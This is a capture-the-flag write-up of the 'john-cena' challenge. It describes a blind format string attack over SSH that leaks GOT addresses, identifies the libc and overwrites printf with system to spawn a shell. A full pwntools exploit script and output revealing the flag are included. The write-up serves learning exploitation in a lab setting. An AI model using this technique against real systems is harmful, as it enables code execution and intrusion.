Rating: 4.0

# john-cena
by mito

### 20 solves, 240 pts

```
I can do a lot of things blindly. Can you ?

Go to: ssh -i <your_keyfile> -p 2229 user@john-cena.ctf.insecurity-insa.fr To find your keyfile, look into your profile on this website.

https://www.youtube.com/watch?v=9kkjr4qcrkE
```

* This challenge requires a blind attack because no binary file is given.
* This challenge has Format String Bug(FSB) vulnerability (index=12).
```
$ ssh -i id_inshack -p 2229 user@ropberry.ctf.insecurity-insa.fr
___ _ _ _ ____ ___ _ ___
|_ _|_ __ ___| | | | __ _ ___| | __ |___ \ / _ \/ |/ _ \
| || '_ \/ __| |_| |/ _` |/ __| |/ / __) | | | | | (_) |
| || | | \__ \ _ | (_| | (__| < / __/| |_| | |\__, |
|___|_| |_|___/_| |_|\__,_|\___|_|\_\ |_____|\___/|_| /_/

===========================================================

You are accessing a sandbox challenge over SSH
This sandbox will be killed soon enough.
Please wait while we launch your sandbox...

===========================================================

Hi everyone all!
So you want this option ?
AAAAAAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p,%p
AAAAAAAA,0x7ffdec8bf1c0,0x7f6b6cdce8d0,0xf,0xf582b5,(nil),0x400000004,0x400000004,0x21732520656e6f79,0xa,(nil),(nil),0x4141414141414141,0x252c70252c70252c
```

* The leaked GOT address is as following.
* I input ` printf` and ` e80` at the [https://libc.blukat.me](https://libc.blukat.me) site and identified the server` libc6_2.27-3ubuntu1_amd64` .
```
0x404008 0x7fc4b79d6170
0x404010 0x7fc4b77c4680
0x404018 0x7fc4b7541510
0x404020 0x7fc4b743c9c0 => puts
0x404028 0x5f5f5f401056
0x404030 0x7fc4b7420e80 => printf
0x404038 0x7fc4b743ab20
0x404040 0x7fc4b743a7e0
0x404048 0x5f5f5f401096
0x404050 0x5f5f5f4010a6
0x404058 0x7fc4b74a0a50
```

* First,the GOT address of puts function was leaked using FSB and then the base address of libc was calculated.
* Next, GOT overwrite printf function to system function using FSB.
* Finally, I could start the shell by sending "/bin/sh".

```
from pwn import *

#context(os='linux', arch='amd64')
#context.log_level = 'debug'

s = process(['ssh', '-i', '~/.ssh/id_inshack', '-p', '2229', 'user@ropberry.ctf.insecurity-insa.fr'])

libc = ELF("libc6_2.27-3ubuntu1_amd64.so")

index = 12

'''
got_addr = 0x404008
for i in range(16):
s.recvuntil("So you want this option ? \n")

s.sendline("%13$s___" + p64(got_addr + i*8))
r = s.recvuntil("___")
leak_addr = u64(r[0:6] + '\x00\x00')
print hex(got_addr + i*8), hex(leak_addr)

s.recvuntil("Do you want to relaunch the program? [y/n] \n")
s.sendline("y")
'''

puts_got_addr = 0x404020
printf_got_addr = 0x404030
s.recvuntil("So you want this option ? \n")

s.sendline("%13$s___" + p64(puts_got_addr))
r = s.recvuntil("___")
puts_addr = u64(r[0:6] + '\x00\x00')
libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']

print "puts_addr =", hex(puts_addr)
print "libc_base =", hex(libc_base)
print "system_addr =", hex(system_addr)

a2 = ((((system_addr & 0xffff00000000) >> 32) - 1) % 0x10000) + 1
a1 = ((((system_addr & 0xffff0000) >> 16) - a2 - 1) % 0x10000) + 1
a0 = (((system_addr & 0xffff) - a2 - a1 - 1) % 0x10000) + 1

s.recvuntil("Do you want to relaunch the program? [y/n] \n")
s.sendline("y")
buf = "%%%dc%%%d$hn" % (a2, index+5)
buf += "%%%dc%%%d$hn" % (a1, index+6)
buf += "%%%dc%%%d$hn" % (a0, index+7)
buf += "_" * (40 - len(buf))
buf += p64(printf_got_addr+4)
buf += p64(printf_got_addr+2)
buf += p64(printf_got_addr)
s.sendline(buf)

s.recvuntil("Do you want to relaunch the program? [y/n] \n")
s.sendline("y")

s.recvuntil("So you want this option ? \n")
s.sendline("/bin/sh")

s.interactive()
```

```
$ python solve.py
[+] Starting local process '/usr/bin/ssh': pid 91776
puts_addr = 0x7f28adc1d9c0
libc_base = 0x7f28adb9d000
system_addr = 0x7f28adbec440
[*] Switching to interactive mode
$ id
uid=1000(sandbox) gid=1000(sandbox) groups=1000(sandbox)
$ ls
exec
flag.txt
$ cat flag.txt
INSA{Bl1nD_4tT4cK_4r3_r34lLY_fUn_f0rM4t_sTr1nG_2}
```